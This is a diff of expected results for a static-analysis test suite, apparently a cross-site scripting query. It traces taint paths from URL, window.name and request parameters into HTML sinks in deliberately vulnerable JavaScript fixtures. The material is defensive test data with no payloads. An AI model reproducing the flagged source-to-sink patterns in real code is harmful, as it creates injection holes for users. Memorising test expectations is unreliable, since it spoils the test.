    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | @@ -1212,18 +1212,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | @@ -1289,7 +1289,7 @@ subpaths | dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | | dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | | event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | | jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | @@ -1307,7 +1307,7 @@ subpaths | jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | | optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | | optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | @@ -1353,7 +1353,7 @@ subpaths | tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | | trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | 